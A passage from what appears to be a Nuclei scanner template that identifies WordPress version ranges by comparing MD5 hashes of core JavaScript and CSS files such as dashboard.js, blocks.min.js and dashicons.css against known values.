3.9.33 - dsl: - - "(\"dec7253451471693a4bbc6f7caea5879\" == md5(body))" - - type: dsl - name: 3.9 - dsl: - - "(\"3dd46c8d228ad29a841338280647936d\" == md5(body))" - - type: dsl - name: 3.8.1 - 3.8.35 - dsl: - - "(\"50626cb79cfc0acdba560abc2e50006c\" == md5(body))" - - type: dsl - name: 3.8 - dsl: - - "(\"b129c7f3e3924ed5333b63876f42ff4b\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"ddc1a40f07fa0698af312e2793e4cb41\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"1afa2caa89a284f06309af1aef0820c0\" == md5(body))" - - type: dsl - name: 3.5.1 - 3.5.2 - dsl: - - "(\"f47d48daa5f6d3bf2b6c2f88f9775311\" == md5(body))" - - type: dsl - name: 3.5 - dsl: - - "(\"7b21a55b15494b9d4d9e80f7904e11e0\" == md5(body))" - - type: dsl - name: 4.9 - 5.1.8 - dsl: - - "(\"2bcbab07977867b916887573559917fe\" == md5(body))" - - type: dsl - name: 5.2 - 5.6 - dsl: - - "(\"8065e85570ca93fb489a57745021a048\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpeditimage/plugin.js" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"d5c9675e20338decbb5cbb5704cbeae3\" == md5(body))" - - type: dsl - name: 4.7.3 - 4.7.19 - dsl: - - "(\"458ea8a81563ce8eaa88303f659fe146\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.2 - dsl: - - "(\"4738b8261ae8b11da71d10be56c25807\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"cdbd8bfddef26eea88e98fbef6b19611\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"fac6e061f27691964e34ba5f02dfff2a\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"8136bbc002d33f1d8231bda314363d57\" == md5(body))" - - type: dsl - name: 4.3.1 - 4.3.25 - dsl: - - "(\"1368498ecb829d4e2c9d74efd0dc522e\" == md5(body))" - - type: dsl - name: 4.3 - dsl: - - "(\"7fa4ce4504456ad54bc13673d3266608\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"f2633c807b88f1a99e21d313a4986f0f\" == md5(body))" - - type: dsl - name: 4.1.1 - 4.1.32 - dsl: - - "(\"bf8fa9a1830d020a8191eb02c7f74b54\" == md5(body))" - - type: dsl - name: 4.1 - dsl: - - "(\"9ce0cd57c664c6b6c72c85b64ea72ea1\" == md5(body))" - - type: dsl - name: 4.0.1 - 4.0.32 - dsl: - - "(\"f1c91e971f2317ad15a0a50154cf1356\" == md5(body))" - - type: dsl - name: 4.0 - dsl: - - "(\"e79814b0b564f9a8b5e06b98ce80b5e9\" == md5(body))" - - type: dsl - name: 3.9.3 - 3.9.33 - dsl: - - "(\"d4d06728cf002756d5f307b0666c7b11\" == md5(body))" - - type: dsl - name: 3.9.1 - 3.9.2 - dsl: - - "(\"8f22e62d72c7f4553d29514d41fb824d\" == md5(body))" - - type: dsl - name: 3.9 - dsl: - - "(\"ed47e3d063b256c3edef89d85d0b516b\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.7 - dsl: - - "(\"510900bd2c55baa38079d9fac576c515\" == md5(body))" - - type: dsl - name: 4.9.8 - 5.0.11 - dsl: - - "(\"275361937714babb1b4ed539582be877\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"39d6da8be0e91e0150c0684f8b9b7274\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"d66af83ce6975dd8408299bfc00934f9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/blocks.min.js" - matchers: - - type: dsl - name: 5.0 - 5.0.1 - dsl: - - "(\"39f14d3f235f1b438feb1983f1246c4d\" == md5(body))" - - type: dsl - name: 5.0.2 - dsl: - - "(\"07722730c567be75e4438cdeeb9afebf\" == md5(body))" - - type: dsl - name: 5.0.3 - 5.0.11 - dsl: - - "(\"f39f38665ac6b784630b3f652375580b\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"7a4696d08badf70c1e40f882ffe45813\" == md5(body))" - - type: dsl - name: 5.2 - dsl: - - "(\"19801973086df807bf07272d475370df\" == md5(body))" - - type: dsl - name: 5.2.1 - 5.2.9 - dsl: - - "(\"c886c5a99073a097c77ac0b89dd6ec66\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"f022f4f2a3248b7ce50e01ccd46f660b\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"5f1739cdb7dda32447c2c81d677e578f\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.1 - dsl: - - "(\"0c070288e2b9c65d47a73b68dbc70053\" == md5(body))" - - type: dsl - name: 5.5.2 - 5.5.3 - dsl: - - "(\"b57ba5af1f0dcb22a28a10a15a1c187a\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"b944c021151abe56dcf15aae4252d4b8\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/blocks.js" - matchers: - - type: dsl - name: 5.0 - 5.0.1 - dsl: - - "(\"55b0f687a9ea42d06bba894f8d3d58a9\" == md5(body))" - - type: dsl - name: 5.0.2 - dsl: - - "(\"a3d6108766198fa534db62d0c9cd02dc\" == md5(body))" - - type: dsl - name: 5.0.3 - 5.0.11 - dsl: - - "(\"e66a65abca2667e9478f1298b964be52\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"bbabeb0779cefc55436edfc4ca85a864\" == md5(body))" - - type: dsl - name: 5.2 - dsl: - - "(\"627c0dca5a0143b6bd29769757aea9e8\" == md5(body))" - - type: dsl - name: 5.2.1 - 5.2.9 - dsl: - - "(\"f8e70eee74b9fada4d55fe508400eff3\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"8d249279b45fc87136d2af98321c9db8\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"60dc7602dbe6addad4f278cea89c736a\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.1 - dsl: - - "(\"a5cfda46f199bc177ec3f6198ca9a160\" == md5(body))" - - type: dsl - name: 5.5.2 - 5.5.3 - dsl: - - "(\"86e6dad06c0a7f869867b207ee1d4838\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"02ce8805820f96d384787c925abe8185\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/dom.js" - matchers: - - type: dsl - name: 5.0 - 5.0.1 - dsl: - - "(\"65e376108b5d8442e0739aa242e75498\" == md5(body))" - - type: dsl - name: 5.0.2 - dsl: - - "(\"13ac23f572d351e0523c16bd91350a37\" == md5(body))" - - type: dsl - name: 5.0.3 - 5.0.11 - dsl: - - "(\"0da7a6c0a8988d47b4cbc451ed68e712\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"342d2e765fb6ff70b894d5fcfc7861ce\" == md5(body))" - - type: dsl - name: 5.2 - dsl: - - "(\"6bc385e8405cb07727a4ebd091b4916b\" == md5(body))" - - type: dsl - name: 5.2.1 - 5.2.9 - dsl: - - "(\"dbb3dfa3c1256ef2d6222ccb3cd482e2\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.4 - dsl: - - "(\"82bd38f305c829b91eaed795af25189f\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"3e341c7a7997aa67b5c81211a6b213b5\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"5fafcc5a10047a3a96f4ec4758767a4b\" == md5(body))" - - type: dsl - name: 5.3.5 - 5.3.6 - dsl: - - "(\"ad44af54b9265c03f60225a806b38a79\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"bdf1d97209882d42e48a2731e681501f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/dom.min.js" - matchers: - - type: dsl - name: 5.0 - 5.0.1 - dsl: - - "(\"91d9eb0578838f14194588b1468319a7\" == md5(body))" - - type: dsl - name: 5.0.2 - dsl: - - "(\"f8fee8733a4739ee773369d652227b08\" == md5(body))" - - type: dsl - name: 5.0.3 - 5.0.11 - dsl: - - "(\"a2f3f8a8d0643c3fef95f4c59b78472a\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"1d8a89e41858235c36fdf20e6033ada6\" == md5(body))" - - type: dsl - name: 5.2 - dsl: - - "(\"d6c4e015c1889eadbcdf2745b92ba58e\" == md5(body))" - - type: dsl - name: 5.2.1 - 5.2.9 - dsl: - - "(\"5f77096af37563d6de3107873f744022\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.4 - dsl: - - "(\"05964cc1e69f018147aeda2b60d4c2ec\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"4d1c93f2308b999efb9a6a3a3f6bac2b\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"f4e037f28dd5e88eecd449ee99700948\" == md5(body))" - - type: dsl - name: 5.3.5 - 5.3.6 - dsl: - - "(\"f949b90ca61d747d51f7620b9a5d5ba1\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"b958b610e6358da9cfffc37e1c158094\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/dashboard.js" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"7ccec58847924e84dfefdd0d25cea2af\" == md5(body))" - - type: dsl - name: 4.4 - 4.7.19 - dsl: - - "(\"e6aee15ae7cbc39c41e0caa2e93ef635\" == md5(body))" - - type: dsl - name: 4.2.3 - 4.3.25 - dsl: - - "(\"2d4f9155e6121a9caa6eb3d6f8c31e5d\" == md5(body))" - - type: dsl - name: 4.0 - 4.2.2 - dsl: - - "(\"dcaf4f687c6c523cf0e2d5515234faa5\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"aeb3ae0f646c3afc88078de88e318c87\" == md5(body))" - - type: dsl - name: 3.8.1 - 3.8.35 - dsl: - - "(\"4d169faec906ab2d91fb44abce00fd44\" == md5(body))" - - type: dsl - name: 3.8 - dsl: - - "(\"e0e87cf173989432bb55a610b0482fa7\" == md5(body))" - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"fa45887a7cdd1c59785925aee26f900c\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"8d1ca3bf59b5e3b0ea34b07e721089ea\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"63f5a605e2f478c7f0c1c1f79a88429d\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"3a144712f35d9aca773bf97d94d5ecaf\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"f5351bd03456d17223b4a5d358b2544a\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"358cfef8c91e5323297ec1b2ea9cb98b\" == md5(body))" - - type: dsl - name: 2.8.1 - 2.9.2 - dsl: - - "(\"2c8218cfd143404d332975abed1aa569\" == md5(body))" - - type: dsl - name: 2.8 - dsl: - - "(\"581b9ca830642beef916bcd39d089e4b\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"2abb58f46ab0b5d7d86670731ecf3862\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"9271890ed60cd3e49b8a561767999e4c\" == md5(body))" - - type: dsl - name: 4.9.8 - 4.9.9 - dsl: - - "(\"31b5f0bb77a13841a2812360f12b3ba6\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"de72cf9420ffc4fbef47ecc53877faea\" == md5(body))" - - type: dsl - name: 5.2 - 5.3.6 - dsl: - - "(\"0df88c30eb7ac52b400b1f2121002f91\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"385a8df73ba0f3b70758893a16a6c571\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.1 - dsl: - - "(\"4e3940567475109556544a82ae81ce16\" == md5(body))" - - type: dsl - name: 5.5.2 - 5.5.3 - dsl: - - "(\"2d5ef0d5d3b1951bd406fd6a73a192bc\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"51faa672d35571c3c7dc665504c0fee9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/dist/block-editor/style-rtl.min.css" - matchers: - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"4a5dde5e3791a76501821da2b1dfce68\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"2820af9602eb1c8443906a9a27d1a819\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"fa9994c1b5de037b9013d1f2ceff882d\" == md5(body))" - - type: dsl - name: 5.5 - dsl: - - "(\"2bad5ad05fc5e11bac6f5bcf95124a8a\" == md5(body))" - - type: dsl - name: 5.5.1 - dsl: - - "(\"fe6ac58ff715c540235e6913dbeb7183\" == md5(body))" - - type: dsl - name: 5.5.2 - 5.5.3 - dsl: - - "(\"0bb01b69a11196ddb298f0d225ccd2c4\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"751c42bf4955e40546dee046ce26b44e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/dist/block-editor/style.min.css" - matchers: - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"09927056d95ca371cbd4d7402b352542\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"0e9b74f1a376a273cb1c2c234cba71b0\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"a877d2f4353f01a9134d8c8ce0db82b4\" == md5(body))" - - type: dsl - name: 5.5 - dsl: - - "(\"fc060f1d7a3619c63ba1fcba852472e2\" == md5(body))" - - type: dsl - name: 5.5.1 - dsl: - - "(\"2259dc170fd1a6bf64025a9e49f4505f\" == md5(body))" - - type: dsl - name: 5.5.2 - 5.5.3 - dsl: - - "(\"1b58e68c6447fdf5d1eccface0d3070a\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"9e67d0efd8ef594b12b1f004c6370753\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/admin-bar.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"dc94d328ab5cbcadc8e9ef6519fc067d\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"a2c05aeb1c11f06a8b3c1bc8888714f9\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"aff1e25a4b4a2e2a46ab7ea46d5b9925\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"f74a750f829fc22f3527d4f156353d10\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"5f72768681f4c37c485fb8c14f6feb3d\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"5a46c32fd25c44db97927a28bcb170b3\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"55285802152cbf7f33740342b5cf5f0e\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"86da19a9b131b04a7fe12d38c592ed37\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"a433160974de4f9d1cde24cce1c4622c\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"769b39e7aec2b06bb29df3323657c334\" == md5(body))" - - type: dsl - name: 3.8.1 - 3.8.35 - dsl: - - "(\"7d0b6b870a3a7e548e1eb870d88c4c81\" == md5(body))" - - type: dsl - name: 3.8 - dsl: - - "(\"4077bbaddd5b0afec30d0465dfee9a1f\" == md5(body))" - - type: dsl - name: 3.6 - 3.7.35 - dsl: - - "(\"030a9d648605161b8ef79df87680f810\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"d6d55a8ea4e14a6fdaa3612a728610c9\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"e7db3dff78abd65e4da012736a676c63\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"163adcbf68e5c0db8fdf677ea303ec5a\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"61762f9b3cf69c62702ea3978b8d684f\" == md5(body))" - - type: dsl - name: 3.1.1 - 3.1.4 - dsl: - - "(\"c92591680afc89977dc066e1c372a122\" == md5(body))" - - type: dsl - name: 3.1 - dsl: - - "(\"181250fab3a7e2549a7e7fa21c2e6079\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"9ea3eba803004cf0fd6fa54f113fc2eb\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"d4848bf7a74b8f06572006f03b22d8df\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.2 - dsl: - - "(\"7d543e6dd3df8e177a96af4edd405cd4\" == md5(body))" - - type: dsl - name: 5.2.3 - 5.2.9 - dsl: - - "(\"5dce0296f703eff6dbf67e7ed1222938\" == md5(body))" - - type: dsl - name: 5.3 - 5.4.4 - dsl: - - "(\"84cc3efbc68b9c92cca44a90175faae2\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"caa38ff10ed1507e35313b9a72f66c22\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"2a85ae0041f1e0eb49d4a7774808e79a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/nav-menus.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"26316cf9639d7b0deeb5e123ffe79a5c\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"5fc6ab945e28c3ec1018d27359fc6fe0\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"86d3b37483ebfc6abed73502569760c7\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"5f236bd826c48e91ff253382c5c37aa1\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"c3363dc9b45a2e183ff4743110e0649c\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"0f976bf7efaf94fab3099a544671bf06\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"d3266344ddb105a2e774a071dd05a361\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"d314bef52d4210718abf723a84c0db97\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"4e458ab9194119cf29d195398952278e\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"6a34c3bf655032a55972f1acb0deedda\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.4 - dsl: - - "(\"ee11d0961a70a281fffdd478bab3db99\" == md5(body))" - - type: dsl - name: 4.9.5 - 5.0.11 - dsl: - - "(\"03fe2a02684af9dd3c05d206434700ee\" == md5(body))" - - type: dsl - name: 5.1 - dsl: - - "(\"eff1f0418baf497fee10aa9421cc7766\" == md5(body))" - - type: dsl - name: 5.1.1 - 5.1.8 - dsl: - - "(\"d9fd1cc345d88a5f0d0ae8ed7b5ffe0d\" == md5(body))" - - type: dsl - name: 5.2 - dsl: - - "(\"aaa89661c610c9d3be7bf098cbd81d9d\" == md5(body))" - - type: dsl - name: 5.2.1 - 5.2.9 - dsl: - - "(\"942abacb51c51c46a7b2eab718b50ff4\" == md5(body))" - - type: dsl - name: 5.3 - 5.4.4 - dsl: - - "(\"a87557e7840940783e60c7877e2a1799\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"ee7b6faa39b4daacb9803c8f28f3e07a\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"944fa1911d43313855e89ef1a548fe59\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/nav-menus.min.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"d6fc2524d57ebc083b7ff7537e224da0\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"f236f953d732ffea81874f232246a427\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"bc513df8fca4987536f8469d24b211ea\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"5bc61e4d6b4a02f424ab9f4847627294\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.4 - dsl: - - "(\"44049d0e74af137633cef06a3d528c2a\" == md5(body))" - - type: dsl - name: 4.9.5 - 4.9.16 - dsl: - - "(\"c23ed53f65d2a33b09841652d534cc5d\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"dd459e1742a3926a3675f688d0ef92da\" == md5(body))" - - type: dsl - name: 5.1 - dsl: - - "(\"4755410b4d7c1cd67fa2dc22c02366e7\" == md5(body))" - - type: dsl - name: 5.1.1 - 5.1.8 - dsl: - - "(\"cb3f33976b5285736dc20089d664cad7\" == md5(body))" - - type: dsl - name: 5.2 - dsl: - - "(\"aef837640e1f39eb578e3bb898e3fe2c\" == md5(body))" - - type: dsl - name: 5.2.1 - 5.2.9 - dsl: - - "(\"422e9259e974a8b75dc5ced61527a267\" == md5(body))" - - type: dsl - name: 5.3 - 5.4.4 - dsl: - - "(\"8aaac8c45315f80ce0f534516d595f7f\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"30620103fe7264b628191d45ba5cc39c\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"8dd847f3f9e6dd3b55c7116fbb88ed5e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/nav-menus-rtl.min.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"b66d358a3f46de1f57cbee6e570e934c\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"985b33c3a44691c0e59b3b40dd5df611\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"e8e736e802c339955e0473f66df03997\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"cf3c105be573bef08e81acc2005563bc\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.4 - dsl: - - "(\"bbd4cf6151b6cb6aef0069f21c974bd1\" == md5(body))" - - type: dsl - name: 4.9.5 - 4.9.16 - dsl: - - "(\"b83ae3ac7bf56384bccae35bd754330f\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"48d54770a01d9bfda2cf1d474fe33ce8\" == md5(body))" - - type: dsl - name: 5.1 - dsl: - - "(\"426ba484cd1e0d2f58f8c4abd314ced8\" == md5(body))" - - type: dsl - name: 5.1.1 - 5.1.8 - dsl: - - "(\"93a88efe33eee0f63d3514a8523c50e2\" == md5(body))" - - type: dsl - name: 5.2 - dsl: - - "(\"aca80e48284d65eb3bfa545286c6bb93\" == md5(body))" - - type: dsl - name: 5.2.1 - 5.2.9 - dsl: - - "(\"6c820a224fb1b62424c77cefc7f61f1a\" == md5(body))" - - type: dsl - name: 5.3 - 5.4.4 - dsl: - - "(\"043de378600b0c2ac4125573d8099a48\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"a7677a0b2c154416be1bb8cedf4ac135\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"832d0ae59a42ef007ab959fc5a9847ad\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/tinymce.min.js" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"86265897eb6b6dd76f6d2a0a90c8420e\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"8f1e10e7c01e44db33c5003d897eaf85\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.3 - dsl: - - "(\"bb16520a021ae170a7019675f2f5f81f\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"7d3d06f33331b3a08222df679ab2c8fe\" == md5(body))" - - type: dsl - name: 4.5.1 - 4.5.23 - dsl: - - "(\"a2ec23124a2989f2a773d65ad1bdf37d\" == md5(body))" - - type: dsl - name: 4.5 - dsl: - - "(\"bae0e7d1036a75aeaed6461677f39adc\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"36fb296e63f7d054a7695d40916004f9\" == md5(body))" - - type: dsl - name: 4.3.1 - 4.3.25 - dsl: - - "(\"8dbe59343ccc14e1c3be2204e4c68c6a\" == md5(body))" - - type: dsl - name: 4.3 - dsl: - - "(\"7fd549b2340d5da4b05e27f16655ce3c\" == md5(body))" - - type: dsl - name: 4.2.2 - 4.2.29 - dsl: - - "(\"df2f5a1e56af39b9ec1b4e2e7bf6d08b\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.1 - dsl: - - "(\"a1410c5a4e18cf08544136bcf0fbfddd\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"f3b51c46d7be402a753613d97c68cfd0\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"b6c6f8d469f55960e57d0a268adb3601\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"f2ddb16f20361a33a873d2516fc90686\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.2 - dsl: - - "(\"db400ecef923dd0e45a03a8efe9e024e\" == md5(body))" - - type: dsl - name: 4.9.3 - 4.9.5 - dsl: - - "(\"cc1033054aede513d5bb550bf85ecc6e\" == md5(body))" - - type: dsl - name: 4.9.6 - 4.9.7 - dsl: - - "(\"ad598feb4b2b6ce0c38d86f89d2f3970\" == md5(body))" - - type: dsl - name: 4.9.8 - 5.0.11 - dsl: - - "(\"e0cc75e46e7be9cda3c4da2a12e6e2f2\" == md5(body))" - - type: dsl - name: 5.1 - 5.2 - dsl: - - "(\"500c07cb726ab6a03c8cfd154414e9d7\" == md5(body))" - - type: dsl - name: 5.2.1 - 5.2.9 - dsl: - - "(\"40b86d22b39ba7ebb195a9fe7d10ff28\" == md5(body))" - - type: dsl - name: 5.3 - 5.4.4 - dsl: - - "(\"f89b18422c3a2b2e95315dd5b7eabe8e\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"2476454ed291bdd96a14c4b7f08ab5bc\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"586ce1e095c0f8b0cca1439fcefe6b6e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/dashicons.min.css" - matchers: - - type: dsl - name: 4.5 - 4.8.15 - dsl: - - "(\"cf3c0e8f26fe2025a0f22138ffe30d53\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"5f672f4380c60d6d7d67604e55aa0e7b\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"e65f96d4f5227b3b03c118b731b6f921\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"5515b659e6fa1b563d7d57287dea2e4e\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"519c5cad73fa9de0f11b7e78479e7599\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"c659db821f14019f9974e62313535cfa\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"3b6d61cac9d02c4ee20bb87f5caab26e\" == md5(body))" - - type: dsl - name: 3.8.1 - 3.8.35 - dsl: - - "(\"515214365da656a845777ddbdc04ee2a\" == md5(body))" - - type: dsl - name: 3.8 - dsl: - - "(\"c2566febd39864bf4abe0ebebd0f147d\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"1c364e777cd2b874ea6cf09100861c6c\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"800e28274109388380449140e310f8bb\" == md5(body))" - - type: dsl - name: 5.2 - dsl: - - "(\"abe89a302a6cd8111574788f7cd3a0d7\" == md5(body))" - - type: dsl - name: 5.2.1 - 5.4.4 - dsl: - - "(\"c8956481e00463f838b45364f45756df\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"d2678bbfdb083928cabb16f0b85d0f1c\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"d5e6ce5103b482fe0a2d355d003e9ffd\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/dashicons.css" - matchers: - - type: dsl - name: 4.5 - 4.8.15 - dsl: - - "(\"cbd78303f0ab99bcf4470575b0f8a7ea\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"091c14c103750ded6e7ded49df51a98d\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"a6907bc29f0d2dcf9a44bf4a56bceca4\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"7d009b6317b016a7d127de92c3a0c905\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: 